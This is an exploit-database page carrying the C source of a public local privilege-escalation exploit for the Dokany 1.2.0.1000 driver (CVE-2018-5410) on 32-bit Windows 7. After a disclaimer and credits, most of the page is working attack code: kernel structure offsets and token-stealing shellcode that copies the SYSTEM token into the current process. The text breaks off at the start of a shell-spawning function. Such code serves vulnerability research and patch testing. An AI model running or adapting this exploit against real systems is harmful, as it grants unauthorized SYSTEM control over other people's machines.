Exploits / Vulnerability Discovered : 2019-01-14 |
Type : local |
Platform : windows
This exploit / vulnerability Dokany 1.2.0.1000 stackbased buffer overflow privilege escalation is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
/*
Exploit Title - Dokany Stack-based Buffer Overflow Privilege Escalation
Date - 14th January 2019
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://dokan-dev.github.io
Tested Version - 1.2.0.1000
Driver Version - 1.2.0.1000 - dokan1.sys
Software package - https://github.com/dokan-dev/dokany/releases/download/v1.2.0.1000/DokanSetupDbg_redist.exe
Tested on OS - 32bit Windows 7
CVE ID - CVE-2018-5410
Vendor fix url - https://github.com/dokan-dev/dokany/releases/tag/v1.2.1.1000
CERT/CC Vul note - https://www.kb.cert.org/vuls/id/741315
Fixed Version - 1.2.1.1000
Fixed driver ver - 1.2.1.1000
Check blogpost for details:
https://www.greyhathacker.net/?p=1041
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 896
// Windows 7 SP1
#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_w7[] =
{
0x60, // pushad Saves all registers
0x64,0xA1,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax Current _EPROCESS structure
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x89,0x91,0xF8,0x00,0x00,0x00, // mov [ecx+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x61, // popad Restores all registers
0x81,0xc4,0x3c,0x0b,0x00,0x00, // add esp,0xB3c Target frame to return
0x31,0xc0, // xor eax,eax NTSTATUS -> STATUS_SUCCESS
0x5d, // pop ebp Restore saved EBP
0xc2,0x08,0x00 // ret 8 Return cleanly
};
int spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;